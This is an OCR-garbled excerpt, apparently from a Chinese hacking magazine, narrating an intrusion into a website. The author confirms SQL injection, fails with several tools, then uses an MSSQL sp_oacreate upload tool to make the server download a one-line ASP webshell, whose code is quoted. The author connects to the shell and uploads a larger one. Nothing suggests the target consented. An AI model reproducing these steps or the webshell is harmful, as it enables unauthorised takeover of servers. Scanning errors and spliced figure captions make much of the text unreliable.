如发现有乱码，请点击下面链接浏览原文
正文摘录:

图5DB—OwNER权限，它不成功不怪它。可是其它的NBsI、HDsI、明小子全检测出来是sA权限的，也不成功就要怪它们了。不过其实这些丁具部是通过相应的数据库储存过程来达到上传的目的的，不成功的话看来是相关的储存过程被删掉了。更不明白的是工具也是这样检测注入点的，为什么工具的and卜1和and1=2就能检测出存在注入，而手工的就不行昵?真是可恶至极了。难道是传说中的人品问题?1：2判断注入点还不and忙2返回了一洞的典型状况。只要输入and1=2时返回的页面和and1=1不一样，大部分情况下都是有漏洞的。而各个注入工具因判断用户权限的方法不一样，因此有的说是sA，有的说是DB—Owner，手工输入andsys％emuser＞O就可以看到用户名了。)sA也奈它不何，开什么玩笑?就要过年了，居然出现这种意外。起初我还怀疑是不是wEB目录搞错了，仔细检查了N次之后确定wEB目录绝对是没错的。于是又用一系列注入工具想把一句话AsP马弄上去，可是不管我怎么弄还是无法找到该页!看来注入工具在这一次渗透中算是已经尽力了。本来想当它就是DB0wNER权限，想用L0G备份一句话木马的，没想到第一步就又提示“对不起，该产品并不存在，请返回”了。唉，看来真的是黔驴技穷了，知道的办法已经全部试过了，就连最拿手的L0G备份也没成功，够郁闷的_『!四、希望之光菜菜贵在学习，现在知道的办法似乎的确不可能拿到webshell了，更不用说什么系统权限了。既然暂时没办法的话就先放一放，于是又上了八进制的论坛到处逛了逛，发现有位同志遇到的情况和我虽不一样，但也有相同之处。在后面的回复中看到一个工具MSSQL上传漏洞利用工具V1.O。这个东西以前还没有见过，不知道管不管用。不管了，下载回来再说，打开后界面如图6。仔细一看才发现原来这是啊D的作品!再看看原理，原来是利用spoacreate来写入一个VBS文件来下载wEB㈨々文件来达到上传的目的。而且还支持exe文件上传昵，不过有两个必须条件：一是要数据库MssQI，数据库类型，二是要sA权限，好在这两个条件今天都满图6足，不然真的没法搞了。嘿嘿。这回又有得玩了，HOH01虽然只支持小于8K的文件上传，但是我的一句话AsP马远远小于8K。注入链接当然就是填注入点了，注人类型是数字型的了(这个工具检测的时候会显示出来的)，下载位置就是相应文件的wEB地址了(这里要注意的是后缀要是txt，如果你的一句话AsP马放到wEB上是asp后缀的话下载到服务器上的文件会是空的，因为一句话AsP马在访问的时候已经执行了，根本不能读取到代码)，保存位置就是在目标服务器的wEB路径了(记得要带文件名哦，后缀要是asp的)，全部填好之后如图7。然后点“上传文件到服务器E”，很快就返回：俄送下载命令，上，请稍候....命令已发送。请图7再访问指定页面，哈哈，是空白的，太好了!成功传上去了。因为我的一句话代码改成＜％ifrequest(”crnd”)＜＞””‘thenexecuterequest(”crnd”)％＞，所以页面不会显示什么“类型不匹配”之类的错误而是只返吲一个空白页。现在当然就是用一句话客户端连接了，提交环境变量，成功返回了服务器相关信息，如图9。再接着就上传了大马站长助手，如图l0。